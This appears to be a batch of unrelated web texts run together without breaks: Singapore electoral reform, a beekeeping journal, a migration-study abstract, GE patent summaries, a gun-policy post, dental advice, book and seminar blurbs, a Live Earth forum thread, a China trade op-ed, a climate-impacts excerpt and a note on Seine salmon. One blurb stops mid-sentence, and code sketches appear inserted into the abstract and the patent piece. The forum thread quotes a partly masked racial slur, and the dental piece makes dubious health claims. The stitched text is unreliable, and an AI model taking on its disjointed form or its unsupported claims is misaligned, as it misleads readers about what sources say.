The National Solidarity Party (NSP) has called for the Group Representation Constituency (GRC) system to be abolished and replaced by single-seat constituencies, with some reserved for minority MPs. Constituencies reserved for minorities would be determined in the way that the current electoral boundaries are drawn up, the party said in a paper released yesterday. The Constituency Reserved for Minorities (CRM) scheme would ensure multiracial representation in Parliament just as well as GRCs but "without most of its major flaws", the NSP said. The scheme is not a new one. It was put up as an alternative proposal during the debate to introduce the GRC system in 1988. But it was rejected on the grounds that some residents would be forced to accept Malay-only candidates, and if the minority constituencies were then rotated around to overcome this problem, it would affect the relationship between MP and resident. This was "fallacious reasoning", the NSP said. It acknowledged that the GRC system has succeeded in "enshrining multi-racialism". But it also "hinders political competition, fortifies the incumbents and works against democracy", it added. In Singapore today, winning an election by appealing to voters on the basis of ethnicity is also "highly improbable", it added. NSP's key criticism of the GRC is that it does not abide by the "one-man-one-vote" rule - a voter in a GRC can elect four to six MPs with one vote, while an SMC voter can only elect one. "There is a lack of parity between the weight of the votes," said secretary-general Jeannette Chong-Aruldoss at a press conference yesterday, attended by about 25 people. The CRM scheme would also "lessen allegations of gerrymandering" and not allow new candidates to "ride on the coat-tails of heavyweight candidates" to enter Parliament, the paper said. Yesterday, political analysts said such a scheme would raise the danger of race-based politics.
Institute of Policy Studies senior research fellow Gillian Koh said residents who do not want to be "locked into a CRM with a particular racial orientation" may move to other constituencies, leading to segregation. National University of Singapore sociologist Tan Ern Ser said the proposal could "reinforce consciousness of ethnic differences". A better approach would be to retain but reduce the size of GRCs to no more than three, until race matters less, he said. Mr Zaqy Mohamad, a PAP MP in Chua Chu Kang GRC, said that minority MPs still face challenges due to cultural sensitivities or language barriers. "There is still a gap, especially among the older generation. I have managed to bridge this over time, but it's still an investment," he said.
• Re-queening a beehive is the hardest, most tedious task in beekeeping. "It's the hardest, most aggrevatin'-ist thing you can do when you keep bees." My anonymous friend was talking about re-queening a hive. I second that emotion. I ordered new queens for all five hives this year, being told that good bee management says you should re-queen your hives at least once every two years. Some people re-queen every year, which is even better bee management. A hive with a young queen will produce more bees and is likely to stay healthier and ultimately produce more honey. The problem is getting the queen into the hive. Actually, the real problem is finding the old queen and killing her so the new queen will be accepted. A queen is somewhat longer than worker bees and thinner than a drone. She has pretty much the same markings as the worker bees, although her wing shape is a little different. Since there is only one queen per hive, you have to find this one slightly different critter among as many as 30,000 or 40,000 other critters. It's a real-life needle-in-a-haystack problem. So, here's the score. My friend Jim Brown has been helping me, mainly because I'm not experienced enough to recognize a queen by myself. On our first go at it, we determined that two of the hives (Hives 4 and 5) had lost their queens -- which made it pretty easy to get the new queens in. Jim found the queen in a third hive (Hive 2). We could not find the queen in Hives 1 and 3. Jim has been back once to look, and I have been in the hives three times for a total of around five hours looking for the queens. So far, new queens 3 - old queens 2. I saw Coley O'Dell at the farmer's market this morning, and as usual, Coley had good advice. He described the method that he uses to find a queen that otherwise won't be found.
I am going to give it a try this evening or sometime tomorrow. Stay tuned. I'll let you know how it turns out. Visit Honey Dot Comb, my beekeeper's journal.
Discussion Paper series, Forschungsinstitut zur Zukunft der Arbeit, No. 6289. In this paper we analyze economic and spatial determinants of interregional migration in Kazakhstan using quarterly panel data on region-to-region migration in 2008-2010. In line with traditional economic theory, we find that migration is determined by economic factors, above all income: people are more likely to leave regions where incomes are low and more likely to move to regions with a higher income level. As predicted by gravity arguments, mobility is larger between more populated regions. Furthermore, distance has a strong negative impact on migration, indicating high migration-related costs and risks. Assuming that high migration costs are caused by poor infrastructure, investments in public and social infrastructure should facilitate regional income convergence in Kazakhstan and improve living standards in depressed regions.
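The "gravity arguments" the abstract invokes are usually written in log-linear form, with flows rising in origin and destination population and the destination/origin income ratio, and falling in distance. A toy illustration of that functional form (the coefficients below are made up for the example, not estimates from the paper):

```python
import math

# Toy gravity model of interregional migration:
#   log M_ij = a + alpha*log P_i + beta*log P_j
#              + gamma*log(Y_j/Y_i) - delta*log d_ij
# All coefficient values are illustrative assumptions.

def predicted_flow(pop_origin, pop_dest, inc_origin, inc_dest, distance_km,
                   a=-8.0, alpha=0.8, beta=0.7, gamma=0.5, delta=1.1):
    log_m = (a + alpha * math.log(pop_origin) + beta * math.log(pop_dest)
             + gamma * math.log(inc_dest / inc_origin)
             - delta * math.log(distance_km))
    return math.exp(log_m)

# Doubling distance cuts the predicted flow by a factor of 2**delta,
# while a richer destination (higher Y_j/Y_i) raises it.
near = predicted_flow(1e6, 1e6, 300, 450, 500)
far = predicted_flow(1e6, 1e6, 300, 450, 1000)
print(near / far)  # = 2**1.1 ≈ 2.14
```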
The General Electric Company of Schenectady, NY, is a major American innovator, involved with the development of technology infrastructure, energy systems and many consumer technologies. The wide scope of this business’s activities makes them a regular feature in IPWatchdog’s Companies We Follow series. See General Electric articles for our features on GE. Recent reports from multiple news outlets announced that General Electric was moving on from plans to develop solar energy power plants by selling its solar technology to First Solar Inc., an American developer of solar panels. At the same time, GE is looking to increase its presence in the aviation industry. The early August acquisition of Avio Aero, an Italian developer of military and civil aircraft systems, is a step in this direction for the corporation. Today, we check in with General Electric to see what technological systems it’s trying to protect through the U.S. Patent & Trademark Office. Many of the published USPTO documents we feature here discuss improvements to energy systems. These include two patent applications, one that would protect smart energy storage for in-home water heaters and another that would protect a system of monitoring damage to power cables. An issued patent discusses GE’s development of a self-healing electrical power grid. We also take a look at two other patent applications that showcase General Electric’s activities in other areas of consumer and industrial innovation. One application is filed to protect a detachable dishwasher door that makes it easier for technicians to provide maintenance. One final application we include discusses a system of trapping gaseous carbon dioxide exhaust from power plants in a solid state. Self-Healing Power Grid and Method Thereof U.S. Patent No. 8504214 An electrical power grid is a very complex system made up of many electrical networks and connections.
A grid is responsible for controlling the access to electrical power for utility subscribers with connections to the grid. Because of the system’s complexity, small issues often build up and can cause some components to operate at a lower capacity or to stop operating altogether because of malfunction. The stress that this creates for neighboring elements on the grid, which must work harder to compensate for damaged components, can lead to grid damage or power outages. Recently, the USPTO awarded General Electric the right to protect a system of damage monitoring for power grids. The monitoring system determines the “current infectiousness rate”, or the current operational state, of grid components. This monitoring system can adjust the operating capacity of grid components if it determines a change in any component’s infectiousness rate. In this way, the grid can prevent against excessive load strain because of damaged components. As Claim 1 states, General Electric has been issued a patent that protects: “A method for determining a self-healing power grid status, comprising: receiving respective real-time monitoring data corresponding to one or more power grid components, wherein one or more agents are coupled to said power grid components; determining a respective current infectiousness state based upon the received respective real-time monitoring data; determining respective output data based upon the respective current infectiousness state; exchanging the respective output data with one or more neighboring agents; generating one or more state transition probabilities based upon one or more parameters and a state transition diagram; and generating a respective new infectiousness state based upon the one or more state transition probabilities.” U.S. Patent App. No. 20130193819 Contemporary dishwashers typically use a hinged door to allow access to the inner cabinet, where dishes can be stacked for washing. 
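Claim 1 above describes an agent loop: read monitoring data, derive an "infectiousness" state, exchange it with neighbors, and draw a new state from transition probabilities. A minimal illustrative sketch of that loop (the state names, probabilities, and neighbor-pressure rule are my own assumptions, not GE's):

```python
import random

# Illustrative agent-state update loosely following the claim language:
# components move between healthy -> stressed -> failed, and stress among
# neighboring agents raises the odds of a bad transition.
# All states and probability values are assumptions for illustration.

STATES = ("healthy", "stressed", "failed")

def transition_probs(state: str, stressed_neighbors: int) -> dict:
    """State-transition probabilities; more stressed neighbors => more risk."""
    pressure = min(0.1 * stressed_neighbors, 0.4)
    if state == "healthy":
        return {"healthy": 0.9 - pressure, "stressed": 0.1 + pressure, "failed": 0.0}
    if state == "stressed":
        return {"healthy": 0.3, "stressed": 0.6 - pressure, "failed": 0.1 + pressure}
    return {"failed": 1.0}  # a failed component stays failed until repaired

def next_state(state: str, stressed_neighbors: int, rng=random) -> str:
    """Draw the agent's new infectiousness state from the probabilities."""
    probs = transition_probs(state, stressed_neighbors)
    return rng.choices(list(probs), weights=list(probs.values()))[0]

print(next_state("healthy", stressed_neighbors=0))  # usually "healthy"
```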
However, the door is often removed when performing maintenance on a dishwasher, which is difficult to do without removing the dishwasher from its enclosure. This is cumbersome because of the need to disconnect plumbing and electrical lines, and can also damage a kitchen floor. This patent application describes a new design for a detachable dishwasher door developed by General Electric. The system allows for a dishwasher door to be detached from the rest of the appliance by sliding the hinge free from a bracket on the door. When the hinge is removed, it frees the fastener connections securing the door’s bracket flanges to the dishwasher. Claim 1 of this patent application seeks protection for: “An appliance comprising: a cabinet defining a chamber; a door removably mounted to said cabinet, said door providing selective access to the chamber of said cabinet, said door defining a pocket at a corner of said door, said door also defining a flange located adjacent the pocket; a bracket configured for receipt into the pocket of said door, said bracket having a first end defining a channel with a c-shaped profile, the first end of said bracket also defining a projection for mating receipt of the flange of said door, said bracket also having a second end spaced apart longitudinally from the first end of said bracket, the second end of said bracket defining a tab, the tab being disposed orthogonal to the flange of said door; a hinge positioned at the pocket of said door, said hinge having a first end positioned inside the channel of said bracket, said hinge also having a second end spaced apart longitudinally from the first end of said hinge, the second end of said hinge defining an extension, the extension being disposed orthogonal to the flange of said door, the extension also being positioned adjacent the tab of said bracket; and a fastener positioned adjacent the tab of said bracket and the extension of said hinge, the fastener selectively coupling the tab and the 
extension together.” Systems and Method for Capturing Carbon Dioxide U.S. Patent Application No. 20130202517 Carbon dioxide gas emissions are a major contributor to the “greenhouse” effect that has caused temperatures to rise across the world over the past century or so. Power plants are considered to be a major producer of carbon dioxide emissions, and many methods have been developed to capture CO2 trapped in exhaust gas from power plants. Liquid solvents can be used to trap CO2 gas in an aqueous solution. However, the large amount of liquid solvent needed to trap the gas makes it economically unviable for many. This patent application, filed by General Electric, was filed to protect a new system of trapping carbon dioxide in a solid state after trapping it as a gas. CO2 exhaust gas from power plants would be diverted into a chamber where it would contact a liquid phase-changing sorbent. This liquid substance would be chemically reactive with CO2 so that it converts carbon dioxide into its solid state. This prevents the gas from being dispersed into the atmosphere and saves it as a solid for later disposal. Claim 1 of this General Electric patent application would protect: “A method for forming carbon dioxide from a gas stream, comprising: chemically reacting carbon dioxide in a gas stream with a liquid phase-changing sorbent to form a solid reaction product, wherein the solid reaction product is in the form of a dry solid, a wet solid, a slurry, or a fine suspension; storing the solid reaction product; and heating the solid reaction product to form carbon dioxide gas and the liquid phase-changing sorbent.” Heated Water Energy Storage System U.S. Patent App. No. 20130202277 The energy used to heat water in a residence can be anywhere from 10 percent to 15 percent of that home’s total energy use. 
In many areas of the country where electricity is scarce and grid demand is high, the cost of a kilowatt-hour (kWh) may vary throughout the day in response to peak demand. Off-peak hours may cost 6 cents per kWh, while high demand can send prices soaring to $1.20 per kWh in certain areas. However, it’s difficult to change behaviors regarding water heating, as showers, washing machines and dishwashers are often operated during peak demand hours. General Electric has recently filed this patent application with the USPTO, describing a system of storing energy for later use in water heating. A thermostat in the hot water storage tank detects the temperature of stored water and sends a control message to an electricity provider if more energy is required. This system would keep hot water temperature within an optimal range while drawing electricity during non-peak hours for later use. As Claim 1 explains, this patent application seeks the right to protect: “A water heater energy storage system, comprising: a storage tank that stores water; at least one heating element disposed with the storage tank; a thermostatic controller that senses and regulates tank water temperature; a signal communication device in communication with a utility that sends and receives system information; and a controller configured to regulate the system based on communications between the signal communication device and the utility.”

System and Method for Health Monitoring of Power Cables
U.S. Patent Application No. 20130194101

Electrical current leakage from power cables can create a dangerous atmosphere for those nearby. Beyond the fact that direct contact with electricity can be fatal, leakage can contribute to damage to electrical systems, which can result in system failure or increased electrical fire risks. In some electrical cables, shields are installed that divert current leakage to a grounded line and away from others.
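Returning to the water heater system for a moment: the control behavior it describes — keep the tank in an acceptable range, and preferentially draw power when rates are low — can be sketched as a simple decision function. This is a hypothetical illustration only; the temperature band, price threshold, and heating policy are invented for the example and are not taken from the patent application (only the 6-cent and $1.20 rates come from the article).

```python
# Hypothetical sketch of a demand-responsive water heater controller.
# The temperature band and price threshold are invented for illustration.

OFF_PEAK_PRICE = 0.06   # $/kWh, example off-peak rate from the article
PEAK_PRICE = 1.20       # $/kWh, example peak rate from the article

def should_heat(water_temp_f, price_per_kwh,
                min_temp_f=115.0, max_temp_f=140.0,
                price_threshold=0.15):
    """Decide whether to energize the heating element.

    Heat whenever the tank falls below the minimum acceptable
    temperature, and opportunistically "store" energy as hot water
    during cheap off-peak hours by heating up toward the maximum.
    """
    if water_temp_f < min_temp_f:
        return True      # comfort takes priority, regardless of price
    if price_per_kwh <= price_threshold and water_temp_f < max_temp_f:
        return True      # cheap power: charge the tank
    return False

# Off-peak and tank mid-range: charge up.
assert should_heat(120.0, OFF_PEAK_PRICE)
# Peak pricing and tank still acceptable: hold off.
assert not should_heat(120.0, PEAK_PRICE)
# Peak pricing but tank too cold: heat anyway.
assert should_heat(110.0, PEAK_PRICE)
```

The design point is that the stored hot water acts as the "battery": shifting the heating into off-peak hours changes when energy is bought without changing when hot water is available.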
The system General Electric describes in this patent application would be able to detect the level of current leakage drawn by the cable shields. A transducer included on the cable’s health monitoring system would measure this leakage and send a current signal to the utility provider that indicates the health of the power line. If the leakage exceeds a certain level, an alarm signal is generated that can shut off the power and prevent damage. Claim 1 of this patent application would give General Electric the right to protect: “A power cable health monitoring system, comprising: a shield surrounding a power cable and configured to divert leakage current from the power cable to ground; a current transducer configured to measure the leakage current and output a current signal corresponding to the leakage current; and a processor configured to receive the current signal and output an indication of the power cable health based on the current signal.”
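The shape of the leakage check in Claim 1 — a measured leakage current turned into a health indication, with an alarm past a threshold — can be sketched in a few lines. The rated-leakage value and the linear health scale below are invented for illustration; they are not taken from the patent application.

```python
# Hypothetical sketch of the leakage-current health check described in
# the claim: a transducer reading becomes a health indication, and an
# alarm is raised past a threshold. Values are invented for illustration.

def cable_health(leakage_amps, rated_leakage_amps=0.5):
    """Return (health, alarm) for a measured leakage current.

    health is 1.0 at zero leakage, falling linearly to 0.0 at the
    rated maximum; alarm is True when leakage exceeds the rating,
    which in the described system could trigger a power shutoff.
    """
    if leakage_amps < 0:
        raise ValueError("leakage current must be non-negative")
    health = max(0.0, 1.0 - leakage_amps / rated_leakage_amps)
    alarm = leakage_amps > rated_leakage_amps
    return health, alarm

health, alarm = cable_health(0.1)
assert alarm is False and abs(health - 0.8) < 1e-9
health, alarm = cable_health(0.6)
assert alarm is True and health == 0.0
```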
What can be done to make schools safer from deranged shooters? Today brought another tragedy, in which one deranged shooter killed 26 innocent people in Connecticut. Some will call for bans on firearms and restrictions of civil rights to make people feel safer. I don't want people to "feel safer"; I want to do something that actually makes people safer. I submit that banning some firearms and restricting magazine capacities would not have prevented today's shooting or reduced the number of innocent deaths. If the goal is to make schools safer for the students, then: 1) Would a law requiring that a certain percentage (perhaps 50% or 100%) of teachers be trained (to local law enforcement standards) and armed while they are teaching help protect the children and themselves? Right now schools are "predator feeding zones" because they are designated "gun free zones". I am not concerned with liberal opposition to my politically incorrect path, or union opposition to changing the job description of a teacher. If the problem is to be addressed then we have to look at solutions that reach the goal. 2) How about designing schools so that someone who seeks to gain access while armed is detected and prevented from entering? Limited access should be easy to design, and all the technology exists: cameras, metal detectors, remote-control doors, intercoms... Harden the classrooms with security doors which can withstand rifle fire and resist being opened with tools. Make the windows high enough to prevent outside viewing, and take other measures I have not thought of, to make it more difficult for a predator to get access to the people in schools. Am I thinking about impossible responsibilities here? NRA Life Member - Orange Gunsite Member - NRA Certified Pistol Instructor "When plunder becomes a way of life for a group of men living together in society, they create for themselves in the course of time a legal system that authorizes it and a moral code that justifies it."
Frederic Bastiat
Healthy Teeth are Important for Our Health

Healthy teeth are determined by lifestyle, dietary habits and how an individual takes care of his teeth. Putting off periodic check-ups and only visiting the dentist when the teeth are in trouble will affect one's overall health.

Why Are Healthy Teeth Important?

Well, do not expect that frequent brushing in the correct manner is all we need for healthy teeth. Many people think that dental problems are minor issues that will not lead to other chronic diseases. Thus, most of us take the easy way out and neglect proper oral hygiene. In actual fact, good oral health is of utmost importance, as our mouths are where food enters our body and where speech originates. If oral hygiene is not given careful attention, the thousands of live bacteria in the mouth can cause tooth decay, periodontal diseases or gum diseases. Researchers have found that periodontitis (gum inflammation) is associated with systemic diseases such as cardiovascular disease, stroke, diabetes and pneumonia. Many chronic diseases can be aggravated by harmful germs that grow in the mouth. Many of us are not aware of this due to a lack of exposure to the importance of having healthy teeth. Given the relationship between periodontitis and systemic diseases, prevention can be an important step in maintaining oral health for overall health. This may sound trivial, but those who do not take care of their teeth and mouth might have to undergo surgery as a result of infections in the lungs, spleen and elsewhere. Therefore, oral health problems should never be underestimated.

How to Maintain Oral Health

According to the experts, healthy gums should have the following characteristics: pale colour, firm texture, and a position close to the teeth.
If our gums do not show these features, it may be a sign of gum inflammation; however, do not worry, because this condition can be overcome with good dental care. We need to brush our teeth twice a day, followed by the use of an effective antiseptic mouthwash to penetrate the plaque bacteria. Nevertheless, this will only clean up to 50 percent of the mouth. If dirt remains, such as tar and tartar, it cannot be removed easily by simply brushing our teeth. Permanent stains can only be removed by our dentist. Thus, regular visits to the dentist are essential for good oral health. Many of us do not know that the human mouth and tongue also harbour many hidden germs. That is why most of us only brush our teeth every day without cleaning the tongue. In order to get a healthy mouth, we should use a tongue cleaner to clean the tongue regularly after every brushing, in addition to using a mouthwash to clean the whole mouth. Most studies have found that the bacteria in the mouth can enter the body easily and make a person susceptible to disease. So, let us start giving more attention to oral health, as it directly impacts our overall health. In a nutshell, there are six things that need to be addressed for overall oral health: 1) Ensure the teeth are cleansed of plaque and food debris. 2) Ensure the teeth are free from the effects of dental tartar (which is usually caused by nicotine in cigarette smoke). 3) Maintain healthy and soft gums. 4) Ensure the teeth are free from cavities (holes). 5) Ensure the breath from the mouth is fresh. 6) Keep the teeth naturally healthy. These six things can be achieved easily through the following four steps: 1) Brush our teeth twice a day. 2) Clean up food debris in between teeth with dental floss. 3) Gargle using an antiseptic mouthwash. 4) Undergo periodic dental examinations at least twice a year. The use of an antiseptic mouthwash can help: 1) Eliminate germs that cause mouth problems.
2) Strengthen tooth enamel. 3) Maintain healthy gums. 4) Reduce dental plaque. 5) Freshen breath. 6) Make our teeth look clean and white. With clean and healthy teeth, we will have a healthy body coupled with a nice smile!
Details: This fascinating selection of photographs illustrates the extraordinary transformation that has taken place in Chester during the twentieth century. The book offers an insight into the daily lives and living conditions of local people and gives the reader glimpses and details of familiar places during a century of unprecedented change. Many aspects of Chester’s recent
Functional Constraints on the Evolution of Eye Morphology – A Deep Look Into the Eyes of Dinosaurs and Teleost Reef Fishes A Department of Ecology and Evolutionary Biology Seminar Series featuring Lars Schmitz, W.M. Keck Science Dept, Claremont McKenna College Wednesday, January 29, 2014 12:00 PM - 1:00 PM 2320 Life Sciences Building I will describe recent efforts investigating the role of functional constraints on the evolution and diversification of visual morphology. The visual system is an ideal case for testing hypotheses about the origins of diversity, because the eye is a complex structure with multiple components, each with specific functional implications. As the physical requirements of vision are clearly defined, one can study morphological and functional adaptations to environments and behaviors that impose divergent physical challenges. In four case studies I will describe how ecology may drive the evolution of eye size, eye shape, and retina structure in such disparate groups as dinosaurs, teleost reef fish, mammals, and squid. A central part of my talk will deal with the possibility of using the linkage between form and function of the eye to make inferences about the diel activity patterns of fossil vertebrates. The results underline that the vertebrate eye offers a rich system for tests of hypotheses about the causes of diversity and is a key to a better understanding of the dynamics between physics and evolution, even though many questions need further investigation. Host: David Jacobs Refreshments will be served at 11:40 a.m.
It is commonly accepted that the majority of engineering failures happen due to fatigue or fracture phenomena. Adhesive bonding is a prevailing joining technique, widely used for critical connections in composite structures. However, the lack of knowledge regarding fatigue and fracture behaviour, and the shortage of tools for credible fatigue design, hinders the potential benefits of adhesively bonded joints. The demand for reliable and safe structures necessitates deep knowledge in this area in order to avoid catastrophic structural failures. This book reviews recent research in the field of fatigue and fracture of adhesively-bonded composite joints. The first part of the book discusses the experimental investigation of the reliability of adhesively-bonded composite joints, covering current research on damage mechanisms, fatigue and fracture, durability and ageing, as well as implications for design. The second part of the book covers the modelling of bond performance and failure mechanisms under different loading conditions.
- A detailed reference work for researchers in aerospace and engineering
- Expert coverage of different adhesively bonded composite joint structures
- An overview of joint failure
To view this DRM protected ebook on your desktop or laptop you will need to have Adobe Digital Editions installed. It is free software. We also strongly recommend that you sign up for an AdobeID at the Adobe website. To view this ebook on an iPhone, iPad or Android mobile device you will need the Adobe Digital Editions app, or the BlueFire Reader or Txtr app. These are free, too.
Size: 37.3 MB
Publisher: Woodhead Publishing
Date published: 2014
ISBN: 9780857098122 (DRM-EPUB)
Read Aloud: not allowed
Discussion in 'Off-Topic Chat' started by dyl, Jul 7, 2007.

Madonna: "If you wanna save the Earth, let me see you jump up" Yup, that'll work!

Providing they have energy-saving lightbulbs in their hands and pull out those nasty 100w bad boys, then yes.

How did all these stars get to this gig then? The hybrid power limo company must have been flat out.

They all walked and swam there, of course. And as an aside, how many will see an increase in CD sales over the next couple of weeks?

Dyl. I am shocked. You of all people being cynical? These publicity-obsessed stars are doing this for the environment. I believe they were all shipped to Wembley in Toyota Prius "zero-emissions" cars. But maybe someone should have mentioned that the electricity to power one of those oversized, energy-inefficient milkfloats was probably generated in a nasty coal-burning power station...

I was dropping in and out of the concert coverage all day, and I have to say I've enjoyed the coverage and the sheer randomness of some of the acts. But I also have to smile at the irony of putting on a concert with a huge PA system, enough lights to light a small city, and flying rock stars around the world to play at it, all in the name of energy conservation. :-?

Have missed Live Earth, but just back from an excellent concert at Sudeley Castle in Gloucestershire. Polysteel were fantastic, followed by Frank Renton and the British Concert Orchestra and a Spitfire, Lancaster & Hurricane fly-past - what a brilliant night. Well done to all at Polysteel for such an entertaining and well-played set :clap: Have now got Live Earth on Interactive and a superb end to a great night - Metallica, Enter Sandman and Spinal Tap, Big Bottoms!! - Top

Heard somewhere that the Red Hot Chilli Peppers arrived at their gig on their own private jet. How hypocritical can you get? Whatever next - Bono lecturing us on global poverty? Charles Kennedy promoting the importance of a smoking ban?
All these stars have done is make the problem worse. If they hadn't had a concert then they wouldn't have burnt all those watts of electricity and flown all those miles on airplanes etc. They just did it for themselves, not the environment! They should have had a brass band concert instead, as we are more energy efficient. We don't use PA systems and we can march to concerts! lol

During the coverage, they cut to the Sydney concert which was just finishing, and ironically, the lights had failed a few hours before the end of the concert! Now that should conserve some energy!! :clap:

Has to be one of the biggest wastes of time I've ever seen! No more than a big luvvie-in for pop stars and pals. Shame on the BBC for presenting such a one-sided case for global warming! Poor David Baddiel got short shrift when he tried to show the hypocrisy of the event. Nice cheap way for the Beeb to take up 10 hours of TV time without any planning anyway. Is it just me or were Spinal Tap better than Metallica? And I really like Metallica!!

Jonathan Ross asked Chris Rock and Ricky Gervais whether Live Earth would make any difference to global warming. Chris Rock told it how it is and said... "Live Earth will cure global warming in the same way that Live Aid cured world famine." He then said something that would have got him kicked out of the Big Brother house and they quickly cut to another overpaid rock 'star'.

I wonder how many of the acts actually did it for free? I'm sure they would have got some sort of money from record companies, sponsors, all the sorts of companies that are contributing the most to the effects of global warming. Very hypocritical!!!

I missed the Live Earth concert - what did he say...?

Can't mind what they said exactly but thought they were hilarious! Didn't think what he said was that bad, but then again I'm not that PC anyway.
Didn't see an awful lot of the show as I was working, but was raging when they cut from Metallica to Crowded House, who were somewhere else in the world, when Metallica were just about to play Enter Sandman. I mean, come on!

After listening to those so-called stars preaching about something they obviously knew nothing about, I turned on every electrical item I have and went outside and burnt a dozen tyres.

I am not too fussed about what he said either, but the PC brigade are...... Chris Rock said something like... 'Global warming is getting so bad that you white folk are starting to go around calling each other *iggers'! Knowing what kind of comedian he is and some of the things he could have said, that was quite tame, but Jonathan Ross seemed quite shocked!!!
Xi Jinping, China’s next president to be, is in D.C. today meeting with President Obama. He needs to get a simple message: America is going to play by China’s rules. Among other things, this means government subsidies for American exporters who make their products here; special protections for what we consider “strategic industries” and technology that we will seed and grow only in the United States; investment incentives for companies that bring jobs back to the United States from other countries, and requirements that foreign companies that want to sell in what is still the world’s most lucrative market must make those products in America. U.S. companies that offshore jobs, production and technology will pay higher taxes, as well as tariffs on their goods entering the country. China can manipulate its currency all it wishes; we will add tariffs on Chinese goods to offset the difference. Don’t protect intellectual property; you’ll get less of it, and what you do get/steal will be subject to yet more tariffs. But isn’t this protectionism? Call it what you wish. Tariffs and other measures to protect American industries and jobs are as old as Alexander Hamilton. They are now China’s rules for doing business, and by doing nothing about it aside from the desultory World Trade Organization case, we are doing great damage to ourselves. The trading world that America made after World War II had a good run, creating prosperity and keeping the peace among trading nations. But it’s over, notwithstanding any symbolic, one-off trade deals announced during this visit. The rise of China and its state capitalism make it null and void because this order was dependent on everyone playing by the same liberalized trade rules. What do we have to lose? China buys little from America and its debt holdings are more dangerous to Beijing than to Washington. 
And don’t tell me about Smoot-Hawley and the Depression: tariffs were already high when Smoot-Hawley was passed, and the world didn’t have today’s globalization issues. No question the corporate and political elites want to continue the status quo. In a larger context, however, it is a recipe for national decline, if not national suicide. In the long run, this will be good for China, too. The vast imbalances of trade, investment and debt can’t be cured without a fast-growing American economy and an American middle class that is rising again. When the communist party finally collapses or reforms itself, maybe China’s new leaders will be interested in playing by the old American rules. In the meantime, America first. And Don’t Miss: Why manufacturing matters, redux || Foreign Policy

Today’s Econ Haiku:
Tolerance pays off
It’s true of economics
And other rainbows
The Impacts and Costs of Climate Change

variable rainfall increase the risk of drought. The implications for water supply are an increase in potential regions of water stress and water poverty. Above a 2 to 2.5°C global average temperature increase, it is projected that an additional 2.4 to 3.1 billion people will be at risk of water stress.[20] The regional area subject to water stress under some scenarios is 10% of the Earth's land surface.[21] Water quality is also sensitive to higher temperatures, lower river flows, saline intrusion with sea level rise and increased storminess. Low flows and higher temperatures are likely to decrease the dissolved oxygen in lakes and slow-moving rivers, increasing stresses on fish. Low flows are already a problem in southern Europe, and this could be exacerbated by climate change. The many local controls on water quality have hindered a global assessment of potential climate change damages. The impacts of projected climate change on water resources appear to be significant. The IPCC's Third Assessment Report highlights that existing water-stressed regions are likely to be more stressed in the future as a consequence of climate change. Water stress is a key impact projected to affect large numbers of people. The effects will be exacerbated by threshold behaviour caused by the interplay between climate change effects, socio-economic trends and limits to adaptation capacity (Arnell 2000; Jones 2000). For many regions under water stress, a global mean temperature increase above around 1.5°C would lead to a decrease in water supply. The table below, from Arnell et al. (2002), summarizes the risks of water shortage with the associated increase in global mean temperature above 1861-1990 for three emission scenarios. The increase in water stress is presented for unmitigated emissions, and stabilization at 550 and 750 ppm CO2, for the 2020s, 2050s and 2080s. Table 7. Population with potential increase in water stress for three emission scenarios.
Year or period | No climate change (millions)(a) | Unmitigated emissions (additional millions) | S750 (additional millions) | S550 (additional millions)
2020s | 5022 | 338-623 | 242 | 175
2050s | 5914 | 2209-3195 | 2108 | 1705
2080s | 6405 | 2831-3436 | 2925 | 762

Sources: Arnell et al. (2002). (a) Number of people in countries using more than 20% of their water resources. Increase in stress means a reduction in resource availability by more than 10%.

One of the main messages from this is that after the 2020s the number at risk rises rapidly with temperature, and that reduction of the increase in temperature at lower stabilization levels reduces the risk substantially (Hare 2003[22]). There is a major increase in the risk of water stress in the 2080s. The shape of the temperature response curves in the 2050s is quite different from that in the 2080s. Risk rises rapidly with any temperature increase in the 2050s, whilst in the 2080s, risk initially rises quite slowly. A 1°C increase in the 2050s is associated with an impact almost ten times larger than in the 2080s, whereas the level of risk is comparable in both periods for a 2°C or higher warming. As temperature increases in the 2080s period from around 1.0°C above 1861-1990 to around 2°C, the number at risk increases about five fold. One of the major reasons for this is the increased water scarcity problem estimated for major mega-cities in Asia in this time period (Hare 2003). One of the major future risks identified in the Parry et al. (2001) and Arnell et al. (2002) work is that of increased water demand from megacities in India and China in the 2080s. It is not clear whether or

[20] Source: Parry et al., 2001
[21] Alcamo, J. and Henrichs, T. (2002) Critical regions: A model-based estimate of world water regions sensitive to global changes. Aquatic Science 64: 352-362.
[22] Source: Hare, W. (2003) Assessment of knowledge on impacts of climate change: contribution to the specification of Art. 2 of the UNFCCC: Impacts on ecosystems, food production, water and socio-economic systems (see AEA Technology Environment, August 2005).

Watkiss, Paul; Downing, Tom; Handley, Claire & Butterfield, Ruth. The Impacts and Costs of Climate Change. Oxford, England. UNT Digital Library. http://digital.library.unt.edu/ark:/67531/metadc29337/. Accessed January 20, 2017.
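The scenario comparison in Table 7 can be made explicit with a short script. The figures below are transcribed from the table; using the midpoint of each unmitigated range is a simplification made only for this illustration.

```python
# Additional population at risk of water stress (millions), transcribed
# from Table 7 (Arnell et al. 2002). Midpoints of the unmitigated
# ranges are a simplification made for this illustration.

baseline = {"2020s": 5022, "2050s": 5914, "2080s": 6405}
unmitigated = {"2020s": (338, 623), "2050s": (2209, 3195), "2080s": (2831, 3436)}
s550 = {"2020s": 175, "2050s": 1705, "2080s": 762}

for period in ("2020s", "2050s", "2080s"):
    lo, hi = unmitigated[period]
    mid = (lo + hi) / 2
    added_share = mid / baseline[period]      # extra risk relative to baseline
    avoided = (mid - s550[period]) / mid      # share of that increase avoided by S550
    print(f"{period}: unmitigated adds ~{added_share:.0%} to the baseline "
          f"at-risk population; stabilizing at 550 ppm avoids ~{avoided:.0%} "
          f"of that increase")
```

By the 2080s the midpoint estimate adds roughly half the baseline again, while the 550 ppm pathway avoids about three quarters of that increase, consistent with the text's point that lower stabilization levels reduce the risk substantially.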
It's been nearly a hundred years since Atlantic salmon swam the Seine upriver to Paris. Now they've done it on their own, without any efforts to reintroduce them. AFP reports that hundreds, maybe a thousand, swam past the Eiffel Tower and Notre Dame cathedral this year. And they aren't the only ones. Only four species swam through Paris in 1995, when up to 500 tons of fish died upriver every year in foul pollution. Today at least 32 species inhabit the Seine, including lamprey eel, sea trout, and shad. Why? Because there have been massive clean-up efforts in the last 15 years, including construction of a new water purification plant. Reduce. Reuse. Recycle. Restore.
